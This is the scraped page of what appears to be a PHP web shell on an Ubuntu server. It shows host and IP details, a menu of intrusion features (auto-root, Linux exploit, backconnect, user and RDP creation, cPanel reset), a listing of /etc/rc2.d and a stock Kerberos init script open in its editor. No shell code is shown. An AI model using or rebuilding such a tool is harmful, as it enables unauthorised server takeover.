Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc2.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01sysstat
1.54
KB
-rwxr-xr-x
K01winbind
1.45
KB
-rwxr-xr-x
S01apache2
7.99
KB
-rwxr-xr-x
S01apport
2.85
KB
-rwxr-xr-x
S01console-setup.sh
1.2
KB
-rwxr-xr-x
S01cron
2.99
KB
-rwxr-xr-x
S01dbus
3.08
KB
-rwxr-xr-x
S01grub-common
985
B
-rwxr-xr-x
S01irqbalance
2.58
KB
-rwxr-xr-x
S01krb5-admin-server
3.33
KB
-rwxr-xr-x
S01krb5-kdc
3.02
KB
-rwxr-xr-x
S01lvm2-lvmpolld
586
B
-rwxr-xr-x
S01mariadb
6.59
KB
-rwxr-xr-x
S01multipath-tools
2.76
KB
-rwxr-xr-x
S01nginx
4.47
KB
-rwxr-xr-x
S01nmbd
1.89
KB
-rwxr-xr-x
S01ntp
1.46
KB
-rwxr-xr-x
S01open-vm-tools
1.8
KB
-rwxr-xr-x
S01plymouth
1.35
KB
-rwxr-xr-x
S01postgresql
1.46
KB
-rwxr-xr-x
S01rsync
4.31
KB
-rwxr-xr-x
S01samba-ad-dc
2.21
KB
-rwxr-xr-x
S01smbd
2.01
KB
-rwxr-xr-x
S01ssh
3.96
KB
-rwxr-xr-x
S01sssd
2.5
KB
-rwxr-xr-x
S01unattended-upgrades
1.36
KB
-rwxr-xr-x
S01uuidd
1.28
KB
-rwxr-xr-x
S01vsftpd
2.02
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S01krb5-kdc
#! /bin/sh ### BEGIN INIT INFO # Provides: krb5-kdc # Required-Start: $local_fs $remote_fs $network $syslog # Required-Stop: $local_fs $remote_fs $network $syslog # X-Start-Before: $x-display-manager # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: MIT Kerberos KDC # Description: Starts, stops, or restarts the MIT Kerberos KDC. This # daemon responds to ticket requests from Kerberos # clients. ### END INIT INFO # Author: Sam Hartman <hartmans@mit.edu> # Author: Russ Allbery <rra@debian.org> # # Based on the /etc/init.d/skeleton template as found in initscripts version # 2.86.ds1-15. PATH=/usr/sbin:/usr/bin:/sbin:/bin DESC="Kerberos KDC" NAME=krb5kdc DAEMON=/usr/sbin/$NAME DAEMON_ARGS="" PIDFILE=/var/run/$NAME.pid SCRIPTNAME=/etc/init.d/krb5-kdc # Exit if the package is not installed. [ -x "$DAEMON" ] || exit 0 # Read configuration if it is present. [ -r /etc/default/krb5-kdc ] && . /etc/default/krb5-kdc # Get the setting of VERBOSE and other rcS variables. [ -f /etc/default/rcS ] && . /etc/default/rcS # Define LSB log functions (requires lsb-base >= 3.0-6). . /lib/lsb/init-functions # Return # 0 if daemon has been started # 1 if daemon was already running # 2 if daemon could not be started do_start_kdc() { start-stop-daemon --start --quiet --pidfile $PIDFILE --startas $DAEMON --name $NAME --test \ > /dev/null || return 1 start-stop-daemon --start --quiet --pidfile $PIDFILE --startas $DAEMON --name $NAME \ -- -P $PIDFILE $DAEMON_ARGS || return 2 } # Return # 0 if daemon has been stopped # 1 if daemon was already stopped # 2 if daemon could not be stopped # other if a failure occurred do_stop_kdc() { start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE --name $NAME RETVAL="$?" [ "$RETVAL" = 2 ] && return 2 rm -f $PIDFILE return "$RETVAL" } case "$1" in start) [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME" do_start_kdc case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; stop) [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME" do_stop_kdc case "$?" in 0|1) [ "$VERBOSE" != no ] && log_progress_msg "krb524d" ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; restart|force-reload) log_daemon_msg "Restarting $DESC" "$NAME" do_stop_kdc case "$?" in 0|1) do_start_kdc case "$?" in 0) log_end_msg 0 ;; 1|2) log_end_msg 1 ;; esac ;; *) log_end_msg 1 ;; esac ;; status) status_of_proc -p $PIDFILE "$DAEMON" "$NAME" && exit 0 || exit $? ;; *) echo "Usage: $SCRIPTNAME {start|stop|restart|force-reload|status}" >&2 exit 3 ;; esac :
Close